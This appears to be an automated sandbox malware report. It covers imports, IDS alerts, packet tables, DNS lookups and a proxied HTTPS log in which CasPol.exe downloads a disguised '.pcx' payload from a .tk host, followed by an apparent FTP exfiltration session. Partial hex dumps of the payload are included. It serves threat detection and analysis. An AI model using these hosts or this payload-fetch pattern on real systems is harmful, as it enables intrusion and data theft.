GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.201.1.1.162662532012811 01/25/23-10:05:53.440564	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	62662	53	192.168.11.20	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 10:05:53.488614082 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.488699913 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.488890886 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.512908936 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.512933016 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.603182077 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.603401899 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.603403091 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.668005943 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.668132067 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.669401884 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.669529915 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.672966003 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.703051090 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.703202009 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.703241110 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.703285933 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.703427076 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.703427076 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.703615904 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.703670025 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.703811884 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.730830908 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.731036901 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.731096029 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.731388092 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.731636047 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.732014894 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.732270002 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.758853912 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.759023905 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.759076118 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.759320021 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.759550095 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.759677887 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.760009050 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.760193110 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.760359049 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.760612965 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.760756016 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.760756969 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.760803938 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.760978937 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.761365891 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.761513948 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.761663914 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.761987925 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.762150049 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.762339115 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.786912918 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.787070036 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.787070036 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.787122011 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.787266016 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.787298918 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.787324905 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.787400961 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.787627935 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.787872076 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.788034916 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.788208008 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.788492918 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.788688898 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.788688898 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.788688898 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.788923979 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.789186954 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.789427996 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.789825916 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.790074110 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.790489912 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.790689945 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.790795088 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.791296005 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.791497946 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.791498899 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.791498899 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.791498899 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.791548967 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.791804075 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.791992903 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.791992903 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.792074919 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.792359114 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.792556047 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.793034077 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.793232918 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.793303967 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.793375969 CET	443	49854	103.83.194.19	192.168.11.20
Jan 25, 2023 10:05:53.793502092 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.793502092 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.793682098 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.793682098 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:53.793682098 CET	49854	443	192.168.11.20	103.83.194.19
Jan 25, 2023 10:05:55.709336042 CET	49855	443	192.168.11.20	64.185.227.155
Jan 25, 2023 10:05:55.709491968 CET	443	49855	64.185.227.155	192.168.11.20
Jan 25, 2023 10:05:55.709748030 CET	49855	443	192.168.11.20	64.185.227.155
Jan 25, 2023 10:05:55.712908030 CET	49855	443	192.168.11.20	64.185.227.155
Jan 25, 2023 10:05:55.712990046 CET	443	49855	64.185.227.155	192.168.11.20
Jan 25, 2023 10:05:56.024872065 CET	443	49855	64.185.227.155	192.168.11.20
Jan 25, 2023 10:05:56.025166988 CET	49855	443	192.168.11.20	64.185.227.155
Jan 25, 2023 10:05:56.026778936 CET	49855	443	192.168.11.20	64.185.227.155
Jan 25, 2023 10:05:56.026802063 CET	443	49855	64.185.227.155	192.168.11.20
Jan 25, 2023 10:05:56.027362108 CET	443	49855	64.185.227.155	192.168.11.20
Jan 25, 2023 10:05:56.030539036 CET	49855	443	192.168.11.20	64.185.227.155
Jan 25, 2023 10:05:56.072312117 CET	443	49855	64.185.227.155	192.168.11.20
Jan 25, 2023 10:05:56.221379995 CET	443	49855	64.185.227.155	192.168.11.20
Jan 25, 2023 10:05:56.221448898 CET	443	49855	64.185.227.155	192.168.11.20
Jan 25, 2023 10:05:56.221601963 CET	49855	443	192.168.11.20	64.185.227.155
Jan 25, 2023 10:05:56.223792076 CET	49855	443	192.168.11.20	64.185.227.155
Jan 25, 2023 10:05:59.860826015 CET	49856	21	192.168.11.20	192.185.87.146
Jan 25, 2023 10:05:59.975033045 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:05:59.975229025 CET	49856	21	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:00.092856884 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:00.095689058 CET	49856	21	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:00.209718943 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:00.209908962 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:00.210305929 CET	49856	21	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:00.364748001 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:02.374598980 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:02.375200987 CET	49856	21	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:02.489794970 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:02.489878893 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:02.490302086 CET	49856	21	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:02.605287075 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:02.605855942 CET	49856	21	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:02.720877886 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:02.721354008 CET	49856	21	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:02.836556911 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:02.838112116 CET	49857	39706	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:02.883348942 CET	49856	21	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:02.952662945 CET	39706	49857	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:02.952820063 CET	49857	39706	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:02.952943087 CET	49856	21	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:03.068484068 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:03.068994999 CET	49857	39706	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:03.117685080 CET	49856	21	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:03.184087038 CET	39706	49857	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:03.184181929 CET	39706	49857	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:03.184232950 CET	39706	49857	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:03.184277058 CET	39706	49857	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:03.184345961 CET	49857	39706	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:03.184483051 CET	49857	39706	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:03.299850941 CET	39706	49857	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:03.299931049 CET	39706	49857	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:03.299984932 CET	39706	49857	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:03.300081968 CET	21	49856	192.185.87.146	192.168.11.20
Jan 25, 2023 10:06:03.300282001 CET	49857	39706	192.168.11.20	192.185.87.146
Jan 25, 2023 10:06:03.352056026 CET	49856	21	192.168.11.20	192.185.87.146

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 10:05:53.440563917 CET	62662	53	192.168.11.20	1.1.1.1
Jan 25, 2023 10:05:53.481072903 CET	53	62662	1.1.1.1	192.168.11.20
Jan 25, 2023 10:05:55.694389105 CET	64157	53	192.168.11.20	1.1.1.1
Jan 25, 2023 10:05:55.703833103 CET	53	64157	1.1.1.1	192.168.11.20
Jan 25, 2023 10:05:59.343787909 CET	63108	53	192.168.11.20	1.1.1.1
Jan 25, 2023 10:05:59.859232903 CET	53	63108	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 25, 2023 10:05:53.440563917 CET	192.168.11.20	1.1.1.1	0x5825	Standard query (0)	enlluec.tk	A (IP address)	IN (0x0001)	false
Jan 25, 2023 10:05:55.694389105 CET	192.168.11.20	1.1.1.1	0x3f7b	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jan 25, 2023 10:05:59.343787909 CET	192.168.11.20	1.1.1.1	0x29e5	Standard query (0)	ftp.sentientshift.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 25, 2023 10:05:53.481072903 CET	1.1.1.1	192.168.11.20	0x5825	No error (0)	enlluec.tk		103.83.194.19	A (IP address)	IN (0x0001)	false
Jan 25, 2023 10:05:55.703833103 CET	1.1.1.1	192.168.11.20	0x3f7b	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Jan 25, 2023 10:05:55.703833103 CET	1.1.1.1	192.168.11.20	0x3f7b	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Jan 25, 2023 10:05:55.703833103 CET	1.1.1.1	192.168.11.20	0x3f7b	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Jan 25, 2023 10:05:55.703833103 CET	1.1.1.1	192.168.11.20	0x3f7b	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Jan 25, 2023 10:05:59.859232903 CET	1.1.1.1	192.168.11.20	0x29e5	No error (0)	ftp.sentientshift.com	sentientshift.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 25, 2023 10:05:59.859232903 CET	1.1.1.1	192.168.11.20	0x29e5	No error (0)	sentientshift.com		192.185.87.146	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

enlluec.tk

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49854	103.83.194.19	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-25 09:05:53 UTC	0	OUT	GET /dkVAJHULLLAJIKvMzyyDm233.pcx HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: enlluec.tk Cache-Control: no-cache
2023-01-25 09:05:53 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 25 Jan 2023 09:05:53 GMT Server: Apache Last-Modified: Tue, 24 Jan 2023 09:29:20 GMT Accept-Ranges: bytes Content-Length: 170560 Connection: close Content-Type: image/x-pcx
2023-01-25 09:05:53 UTC	0	IN	Data Raw: 5f 8e 4e 1b e1 e0 93 aa a8 be 4a 16 f2 ec 59 bf f5 ad 22 f4 8e cd 44 18 7d 23 61 04 32 37 14 61 c0 a8 1e e5 2d ed d8 98 5e 6d e7 c6 22 53 01 6a d1 c4 17 be 2a cc 2a 86 10 a2 de a0 7c 28 f2 d9 13 c7 80 77 26 0e 1a c4 32 22 97 e4 99 d6 e7 63 b8 bc 49 e1 1c be 07 8f 3a 64 20 7a 9b 15 38 b4 90 a8 18 1f a9 11 0e f3 44 e7 6b 68 64 f1 23 9f 1a 7f 57 81 19 6a d3 1f fd 1c d0 bb 7e 1d 86 d3 2a 8e 8e 68 4e 36 b5 77 26 ad c5 dd a1 af a3 e2 00 c6 fd 5c 65 5e 67 e2 ac 6e 52 3f 02 28 fa 5a 56 ad d9 22 70 52 fc 09 fe c8 80 30 d3 a4 d7 72 66 db 71 7c 04 c1 2b 51 45 8c 52 28 f4 bc 03 a1 3c e2 7a 30 d0 3f 1a c0 65 98 b0 54 83 61 f9 f5 89 67 64 a5 80 ec 58 2e ac b8 81 6e aa ce 45 65 db 10 45 e1 31 a4 b5 ab 4e c3 e9 70 ec 6e b3 bc ca 5f 7b d3 83 2a 3b 8c f9 45 6f 55 78 d1 6f Data Ascii: _NJY"D}#a27a-^m"Sj*\|(w&2"cI:d z8Dkhd#Wj~hN6w&\e^gnR?(ZV"pR0rfq\|+QER(<z0?eTagdX.nEeE1Npn_{*;EoUxo
2023-01-25 09:05:53 UTC	8	IN	Data Raw: 7d 76 52 89 86 13 ec 57 53 56 e5 6c ff 6d 12 9c 3c 11 ad f4 0d f0 e1 08 07 62 7d e5 42 14 8d 75 d7 8e fb dd e0 9f ec c8 b0 3f 51 6e e9 63 bf 64 c1 e5 7a 54 da 32 b6 e5 dd 7b 83 8d 33 77 93 65 86 76 df ff 53 02 35 3a 05 92 66 f8 b1 79 38 bd 15 9c 37 58 93 41 61 d4 da ef c5 6a 4d b6 9f 31 4b f6 fc d6 d1 cf 36 18 32 88 01 f6 17 c3 5a fe ec 37 85 f9 b6 3c 66 55 45 60 9b 3e c4 fa 25 21 fa 5d 3a 47 e3 3a e0 10 63 75 76 12 75 0d 5b 1a c4 30 5f e6 e4 66 2d e5 4b 56 bc 49 e7 1f a0 34 af 78 41 5b 15 9b 15 3c 94 48 73 8f 1c 81 7d 0c f3 42 cf 64 68 64 fb 5e f0 1a 7f 53 b9 c2 6f d3 1f ff 34 9c bb fe 1b 85 cc 2d 6f 35 39 62 a2 be 9f 7c 7a c4 91 68 ae 51 51 fe b6 f5 40 15 31 06 b8 c2 03 72 56 1e 29 94 35 26 b5 16 42 50 20 8b 4f 92 a1 ee 16 94 f4 f7 ac 0a eb 39 39 28 e9 Data Ascii: }vRWSVlm<b}Bu?QncdzT2{3wevS5:fy87XAajM1K62Z7<fUE`>%!]:G:cuvu[0_f-KVI4xA[<Hs}Bdhd^So4-o59b\|zhQQ@1rV)5&BP O99(
2023-01-25 09:05:53 UTC	15	IN	Data Raw: 28 46 fc 60 d1 06 ef b1 00 02 70 ae 9f 2a 9d 94 03 4b ee c3 5f 94 e5 80 28 52 24 3d e7 34 d8 15 2f 1c 69 e3 1b e2 5a 85 dc 7e a6 f9 5e 2b 7e ae c4 7d a2 96 f5 d1 ea 77 67 52 ae 9c 15 03 4b 36 de e5 6d 9a af 11 ba e8 b3 ba e2 3a 63 29 92 15 47 00 eb cc 7b 10 26 00 7c 04 cf e1 ca 3e c8 b0 31 69 5a 6d f3 40 ba cb f5 0a de cc 3a b2 cd c9 14 98 87 4e 12 4f 62 a8 74 dd 85 3e 02 35 3e 78 93 67 a7 61 a6 38 9a cb 9c 1c 5a 93 41 61 32 2c ee cb 6a 54 b6 67 7e 48 dd f9 d6 d1 c4 3f 08 94 5b a6 f3 3f af 59 fe ea 0e 02 f3 9d 29 4c 4d 51 e5 18 12 c7 fe 18 09 f8 58 50 3b e2 16 e6 11 61 5e 9d 0b 47 21 0e 15 c7 36 22 b7 e4 66 38 f1 70 10 84 eb e0 1c be 07 9e 6a 7b 29 84 9a 39 21 bc b0 d0 c8 88 aa 39 62 f1 44 e1 04 0e 64 f1 29 a6 48 7e 57 81 06 60 c0 0f fd 0d c0 a7 00 1c aa Data Ascii: (F`p*K_(R$=4/iZ~^+~}wgRK6m:c)G{&\|>1iZm@:NObt>5>xga8ZAa2,jTg~H?[?Y)LMQXP;a^G!6"f8pj{)9!9bDd)H~W`
2023-01-25 09:05:53 UTC	23	IN	Data Raw: ae 41 9c 42 54 ab c4 1b 6f f2 bd 04 ba ee 40 d0 54 6e 2e 29 1e b4 28 a4 e5 54 85 62 c7 e6 52 34 f8 f2 ef ef e3 05 43 b6 47 5f 4a 57 78 8f 46 da 04 c8 9a f6 73 77 bf 29 6c e9 60 cc 1f ce 07 05 02 6b ba 84 fc 42 b9 0b 44 ec cf cd b7 5d 93 2d 58 24 30 da 1a 0a ae 20 33 06 8e 7d e4 4c a7 27 63 b8 ec 48 22 7e a2 dd ab 75 bb f3 c1 ea 79 6d 4b 87 94 03 17 5e 50 a8 e4 41 85 af 3d 8d 32 a4 f3 fc 29 2a 3e 96 8a 23 23 59 56 38 30 79 ec 86 fb cc ef f4 66 c9 9c 3f 53 5c 81 09 bf 75 c0 f8 0b de db 1e b0 e6 d7 43 c5 78 b1 e7 9b 4f 99 44 d9 84 78 02 35 3e 4b e6 66 e9 a3 ac 10 a3 cb 9b 04 a6 92 6d 64 d0 f0 f5 ce 6a 53 a1 99 21 66 f0 ff fa 23 d6 36 28 31 90 cf f1 3b c4 59 70 85 0b 84 ea 96 2f 61 45 ad 9f b6 11 c7 ed 39 2b fd 41 d3 b8 ce 14 c9 39 4a 98 b5 fa 77 25 04 18 c7 Data Ascii: ABTo@Tn.)(TbR4CG_JWxFsw)l`kBD]-X$0 3}L'cH"~uymK^PA=2)*>##YV80yf?S\uCxODx5>KfmdjS!f#6(1;Yp/aE9+A9Jw%
2023-01-25 09:05:53 UTC	31	IN	Data Raw: 98 95 b1 eb c7 f7 f1 09 07 6b a2 0a 51 25 fd fe ba 45 a9 b7 9a 76 e3 39 c8 dc cb eb b6 5c 5f 03 e0 89 d2 95 43 dc 78 1e 96 e3 9d 7c f2 3f db af 43 d8 17 6a 52 5d d7 d0 3f 85 bc 53 ac d2 0c e5 93 a2 55 7e ee 40 da 5c 78 44 96 0f b1 39 72 0c 78 80 4f ce 81 40 31 fe f1 e2 d0 0e 05 6f b6 7f b0 2b a8 87 5b 42 d0 1f 33 8c f0 76 69 5a 47 5b ef 67 ca dc d6 10 02 2a 9f bf 98 04 2c e2 02 4d fb da 53 d3 38 81 28 5e 1d 61 c7 e4 01 af 3a 25 01 8e 61 e5 4c ab 23 2b a6 ff 47 0f 67 a1 d6 51 1b 1f f5 d7 f3 6f 71 70 40 94 12 18 7b 0a a8 1a 92 4e 7f 00 9b c8 a5 a6 ef 2d 20 55 84 04 4a 1b 3b 9c 11 09 ad ff 85 d1 dd ea a3 d4 c8 b0 39 53 4b 92 cc bf 64 c5 a7 00 20 da 32 b0 cd d2 75 83 87 4e 18 93 65 82 76 dd 84 22 9b 35 3e 78 52 67 f8 b5 ea 39 9b cb 92 1d 58 93 41 60 c4 da ef Data Ascii: kQ%Ev9\_Cx\|?CjR]?SU~@\xD9rxO@1o+[B3viZG[g*,MS8(^a:%aL#+GgQoqp@{N- UJ;9SKd 2uNev"5>xRg9XA`
2023-01-25 09:05:53 UTC	39	IN	Data Raw: 1f 14 20 69 d6 4a 51 f4 b4 49 95 68 27 ec 41 1a d1 81 c5 b0 37 f7 a8 1c 34 63 d2 a5 5f 11 f5 38 82 61 9d c7 4a 15 ca 19 f0 2b 93 e2 47 75 f1 7a 0a 4c e5 d5 79 9e e8 27 95 b1 e3 d0 7a e2 db 06 6a b1 47 40 2e eb f9 e4 d8 b8 b2 f5 68 e3 39 c2 f4 22 e9 b6 5a 4c bf f5 8f fe ca 52 d8 69 e7 85 6e 8e 72 f2 3e c8 a3 52 d4 78 76 52 5d dd 8a 46 84 bc 67 84 c8 1d 86 9e ab 3a ce ee 40 d0 4d 7d 2b 29 0f b1 33 5a f7 78 80 49 c5 ff 41 31 8f e6 ea f8 1e 04 6f bc 44 77 d5 56 63 b5 4a c2 d9 cc 9a e7 39 69 41 39 56 fc 69 eb 2c c7 05 0e 15 84 be b4 0c 63 3f 0a 25 01 e3 3b be 40 86 22 40 26 3b c7 f5 05 94 d2 35 29 e5 1b f3 5f a3 0b 6e a8 e7 b3 23 43 a5 ec 57 5f 45 eb 5a dc 7d 76 59 a7 44 67 13 41 5d 7e 6b 6d 90 7b 19 82 bb 96 ab ef 2c 1e ea e9 05 4a 15 cf cc 12 2f 79 f3 a3 d1 Data Ascii: iJQIh'A74c_8aJ+GuzLy'zjG@.h9"ZLRinr>RxvR]Fg:@M}+)3ZxIA1oDwVcJ9iA9Vi,c?%;@"@&;5)_n#CW_EZ}vYDgA]~km{,J/y
2023-01-25 09:05:53 UTC	47	IN	Data Raw: 7b 79 e4 7e ab aa e4 74 f4 8d b1 0a 38 2b 65 d7 50 d5 41 0f d5 52 2c ad a1 f7 30 3e 90 48 0b 3e 15 26 d8 ca 5b 36 4a 06 04 d8 34 31 50 78 bd 89 d8 44 42 8c f9 d1 e7 44 a8 de 68 fe 64 73 e1 a4 14 3f 79 07 f1 95 00 cd 87 ee 99 0e aa 52 be cb 72 d8 99 4c 1b 8c 58 83 61 9f c7 5b 1f a8 e6 f1 07 dc 91 32 75 4a 71 00 54 f8 df 79 8f e2 3f 6b b0 d8 3a 7a e2 09 79 c7 b1 01 4a 0e c2 0e 71 db 90 d0 f7 68 e5 56 6c f4 22 e1 bd 5d 61 0d f7 9c f9 52 b7 d8 69 18 86 01 21 7c f2 34 db ab 44 c7 71 4c cb 5d dd bf 55 8c ad 5c 1d c4 1a e9 f4 05 3a c0 e4 4d d9 6d 90 c4 be 0c 99 5f 58 e4 7e ef f9 a1 fa 4b 45 f4 e3 ea f9 0e 00 66 9c b8 98 42 54 50 e9 4e c2 11 a2 2a e7 76 63 35 24 40 ef 66 d3 05 c1 67 74 03 7a b9 8b 04 52 93 23 80 12 5c 54 94 2c 82 28 5e 5a 48 c6 e4 0d 93 2a 25 01 Data Ascii: {y~t8+ePAR,0>H>&[6J41PxDBDhds?yRrLXa[2uJqTy?k:zyJqhVl"]aRi!\|4DqL]U\:Mm_X~KEfBTPNvc5$@fgtzR#\T,(^ZH%
2023-01-25 09:05:53 UTC	55	IN	Data Raw: f2 dc 39 0c 04 3e f5 a7 c8 eb 8d 48 86 d8 6d 20 8c 31 25 57 08 81 15 ca fe 3f 7b 7f 7a f9 d1 3c 49 21 ef 69 e6 09 ab 63 48 b7 fa e1 56 94 1f 51 6d 6e 64 21 49 54 29 5b 00 27 cb aa 81 f5 de f4 8b 95 a3 30 41 e2 56 3c d7 45 23 98 5a 2f d0 02 df cc 3b ba 10 1a 04 03 3a f0 9d 58 16 1a d3 ce 24 e3 a2 8c 76 a9 bd 19 53 60 8a d3 d4 8a 24 02 de 62 26 3d e5 e2 a7 6f 86 6c 16 e0 ae 0a dd c5 07 22 0c 82 3e e1 cb 74 e9 35 49 79 48 6c ee 63 9f c1 25 1f bf 18 fa 03 29 e3 47 73 25 c8 0b 4c ed c6 6f 8f fe 48 2c b0 e1 d6 6c 8d d2 07 6a bb 6e f9 2f eb e7 f0 b7 63 bc f5 62 8c 80 c3 f4 24 fc d9 81 4c 05 fb e0 47 8e 52 de 7f 77 5a 6e 8e 76 9d 85 c9 a3 54 c7 6f 65 40 75 2f bf 44 8e 9c ef 91 a0 e1 c9 f7 a9 3a c6 81 ec d0 4d 77 3a 3e 1e a7 5c e3 e5 78 86 5f ce 21 41 31 f2 8c 53 Data Ascii: 9>Hm 1%W?{z<I!icHVQmnd!IT)['0AV<E#Z/;:X$vS`$b&=ol">t5IyHlc%)Gs%LoH,ljn/cb$LGRwZnvToe@u/D:Mw:>\x_!A1S
